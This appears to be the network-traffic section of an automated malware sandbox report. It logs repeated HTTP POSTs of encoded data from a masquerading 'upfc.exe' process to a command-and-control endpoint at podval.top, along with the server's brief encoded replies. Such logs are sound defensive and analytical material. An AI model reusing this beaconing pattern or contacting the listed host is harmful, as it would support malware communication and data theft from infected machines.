                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9xQPnIIBWGJfaSxBJB8twjMNZBgj4bognFe3w1fC47VnV9QZgfz2aJvK%2Blru0bgc9dZBop8bYyCFCEvXrCnAuVvCCnSwjf7PvwTUxQKuFcxCEHmL%2FTZkOKZHYVX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4d86cb87d0e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    46          192.168.2.10  49763        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:45.721298933 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:46.075859070 CEST  1060               OUT        Data Raw: 5f 5a 5f 5a 5e 58 52 5c 58 56 55 51 50 50 59 51 55 50 5e 5c 51 5d 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_Z^XR\XVUQPPYQUP^\Q]S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%)#$8$ +Z(>.7==9-506$S,/[7"'/"['$Y
                                                    Jul 3, 2024 16:42:46.169296980 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:46.525403023 CEST  582                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMcpoUsgnp68%2BCqG7XMPfvXoCZjN4ZbkmkP27ykcjATzMe9nTbcDaxtwIo2x9aVWKL5WPXubxdxCKZKuLhLG%2BivVis%2BsUohPL3%2BFgjigSqznyE5ZrU8LqXBXRk5a"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4de4e1cc3f0-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    47          192.168.2.10  49764        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:46.951354980 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:47.307084084 CEST  1060               OUT        Data Raw: 5f 5a 5f 54 5b 5e 52 5f 58 56 55 51 50 5b 59 51 55 5b 5e 5e 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_T[^R_XVUQP[YQU[^^QXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&<0,3V+Z>9V -:>365' ?8;[#[;"['$Y -
                                                    Jul 3, 2024 16:42:47.428067923 CEST  25                 IN         HTTP/1.1 100 Continue


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    48          192.168.2.10  49765        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:47.735857010 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:48.088502884 CEST  1772               OUT        Data Raw: 5f 54 5f 5b 5e 5d 57 5b 58 56 55 51 50 5e 59 57 55 5c 5e 5c 51 5b 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_[^]W[XVUQP^YWU\^\Q[S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2'_+37Z).4=-5'%=]$<,.#8_/,"['$Y
                                                    Jul 3, 2024 16:42:48.206337929 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:48.414809942 CEST  727                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGqovOxBRhXcAfPqfZQW47wjm8pMU5%2FxMBafPzqY%2B7LMRWBotY6BT6SBL2T4poyphvywRvj0Utf7rc2gRs1kDocPRQGP9CcEGTbXpZOQfmmebQmeU2TW9gUMUefO"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4eb081741a9-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 06 31 14 36 03 32 32 01 1b 2e 2e 2f 53 3c 2d 28 5d 2c 2a 2a 02 3f 34 07 5b 2d 07 3d 08 22 39 2e 15 3c 12 38 14 31 0e 3f 08 35 31 20 5b 04 1c 23 59 2b 04 07 58 3c 38 2b 53 32 3f 32 1b 30 37 3d 13 30 15 2d 0c 24 5e 28 03 3f 01 26 09 30 1c 2f 1e 2a 5e 2e 1c 2a 24 36 1d 35 34 21 54 02 13 22 50 27 04 29 56 37 56 37 54 25 23 26 07 26 34 24 0b 24 30 2a 54 3e 1d 21 0d 24 22 3b 00 35 11 2f 1f 26 38 31 06 27 3d 3d 5d 36 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&1622../S<-(],**?4[-="9.<81?51 [#Y+X<8+S2?207=0-$^(?&0/*^.*$654!T"P')V7V7T%#&&4$$0*T>!$";5/&81'==]6#_+)V3YT0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    49          192.168.2.10  49766        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:47.873372078 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:48.228888988 CEST  1060               OUT        Data Raw: 5f 5a 5a 58 5e 5f 52 5f 58 56 55 51 50 5a 59 52 55 51 5e 54 51 5b 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZX^_R_XVUQPZYRUQ^TQ[S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%:$E0:#'')>5U4-[.=9]3&&$U3/.?[71 ,"['$Y )
                                                    Jul 3, 2024 16:42:48.323013067 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:48.675503016 CEST  590                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64u6bNfsD8a9qv9fI%2BD1gButqeV0zFVGOrK4zhci1S%2BusUc3%2Fn5V%2BiYV2DcyILLOM%2BsHcBIjYdGOLUY%2Bqek5M7%2FR5aFGHHamWhWZjBr6a1abW%2Bjx5or8y6BOluvn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4ebbe2543bb-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    50          192.168.2.10  49767        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:48.810914040 CEST  270                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:49.170265913 CEST  1060               OUT        Data Raw: 5a 56 5f 5a 5b 5a 52 5c 58 56 55 51 50 50 59 54 55 5c 5e 54 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_Z[ZR\XVUQPPYTU\^TQTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[%$?'38=)W [)Y->$!'?U,X84$_/"['$Y
                                                    Jul 3, 2024 16:42:49.256891966 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:49.598372936 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WIZKZS6IMvcYMQ%2Bs9NzWOsr82dUvdBCH8k48RjOgrcAtmtGutntWPaL9Q%2Bviuf3Z80IebEDsuZVZFSh8uDVLgLCWFNp1n3Pdzicw0x2l4b%2B0zyutdk%2BgTP%2BVpdEo"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4f19e0718ea-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    51          192.168.2.10  49768        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:49.736592054 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:50.088299036 CEST  1060               OUT        Data Raw: 5f 56 5f 5f 5b 5b 57 5d 58 56 55 51 50 5e 59 56 55 5d 5e 55 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V__[[W]XVUQP^YVU]^UQ^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%)')4'(.54.%Y."'*3U--#[ 14_8<"['$Y
                                                    Jul 3, 2024 16:42:50.180145979 CEST  25                 IN         HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:50.525412083 CEST  584                IN         HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:50 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opADZT23yBp1%2B%2BFxaM3kDVAS4WNwsjYxSeMRa7skuJt5Mb0m5rLOIHPnwog%2FcTC3XlHtOw3K%2BGpiu4Tcwzt3wy4ZatVjatofaXjFmZikMCq%2FpW8NkXSYT5VQNqA2"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4f75b540fa5-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                    52          192.168.2.10  49769        188.114.97.3    80                6960  C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 3, 2024 16:42:50.654637098 CEST  294                OUT        POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:51.010195971 CEST | 1060 | OUT | Data Raw: 5f 50 5f 5d 5e 5d 52 58 58 56 55 51 50 58 59 56 55 5c 5e 5c 51 5b 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_]^]RXXVUQPXYVU\^\Q[S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]2:8$9+_'0?>V7"..0%0 /X7Z "(X/,"['$Y !
                                                    Jul 3, 2024 16:42:51.117734909 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:51.483047009 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wek2jbcshoJz7OvylBdIbeHl0gom1Wp8vvyuN4YragKTcS2wgGbMQiBkIqpLwtNN0S6pm3tGOp4OgVtDeYC3IeMy8BniyufnmNW7Gm1BEwsaqFW%2BDQbzAJyHMj%2BU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4fd3f658c1e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    53 | 192.168.2.10 | 49770 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:51.651438951 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:52.010250092 CEST | 1056 | OUT | Data Raw: 5f 56 5f 55 5b 59 52 5b 58 56 55 51 50 59 59 52 55 59 5e 5d 51 54 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_U[YR[XVUQPYYRUY^]QTSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2*$E':($#;)"#.=Z9..'5)Y'+W,8#T;;<"['$Y !
                                                    Jul 3, 2024 16:42:52.132659912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:52.494422913 CEST | 576 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSfE%2BHbZz1HhILsTFa4pKXU9gimNitEuRCJ01i6LzcPWFLmrSC3s9wobuUg1yVynTekAx4pdCnPIyYqYS70ncx5zpsjRJ1lxEFE0Q8fwHWJlidi1OVi7Xz4jgARr"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5038ca94301-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    54 | 192.168.2.10 | 49771 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:52.624691010 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:52.979403019 CEST | 1060 | OUT | Data Raw: 5f 55 5f 55 5b 5c 57 5a 58 56 55 51 50 50 59 57 55 51 5e 5b 51 5e 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_U[\WZXVUQPPYWUQ^[Q^SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&9 3#33 *=6729>35![00<;X<7(-,"['$Y
                                                    Jul 3, 2024 16:42:53.098740101 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    55 | 192.168.2.10 | 49772 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:53.429064989 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:53.775899887 CEST | 1772 | OUT | Data Raw: 5f 51 5a 5b 5b 58 57 5b 58 56 55 51 50 5c 59 53 55 5c 5e 55 51 5d 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _QZ[[XW[XVUQP\YSU\^UQ]S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y190B$9?^$V(=6 59="$6%[0 7W--; 8^/"['$Y 1
                                                    Jul 3, 2024 16:42:53.884541988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:54.104304075 CEST | 729 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMQGgzH7hSr0j37r0oUg8wZGEj8hsY7QIjMNG8K0ZcJ7iJcqJ1vmgF8KmNJ6KQ5veLRfuiU6Vp5yhYaO5L4un4DXOSMKvXI5YuYW2IZw%2BQ1%2Bkk%2FIlaQdBZ31ILsD"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a50e8f90c463-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 58 27 29 2d 5a 26 1c 2b 1b 2c 2d 09 14 3c 3d 0e 5d 2d 3a 3a 04 3c 1d 21 59 3a 58 22 53 20 2a 21 05 2b 3c 30 5c 25 30 20 57 36 31 20 5b 04 1c 23 58 28 39 36 07 3c 01 27 1c 26 12 0f 0b 33 0e 29 11 33 3b 3a 11 24 5e 27 5d 2b 06 18 09 33 0c 27 59 2a 3b 31 00 2b 51 26 5e 35 34 21 54 02 13 21 0d 33 04 21 1c 23 23 34 0e 26 20 2a 01 24 34 30 0b 27 33 36 1f 2a 33 3a 55 26 31 3c 13 36 01 23 57 27 3b 25 07 33 3d 00 02 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%X')-Z&+,-<=]-::<!Y:X"S *!+<0\%0 W61 [#X(96<'&3)3;:$^']+3'Y*;1+Q&^54!T!3!##4& *$40'36*3:U&1<6#W';%3=!(#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    56 | 192.168.2.10 | 49773 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:42:53.598925114 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:53.947949886 CEST | 1060 | OUT | Data Raw: 5f 55 5f 5e 5e 5b 57 59 58 56 55 51 50 51 59 52 55 5f 5e 5d 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_^^[WYXVUQPQYRU_^]QXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y%'0/^'0[=*#.>]'&%[$3/.Y47;<"['$Y
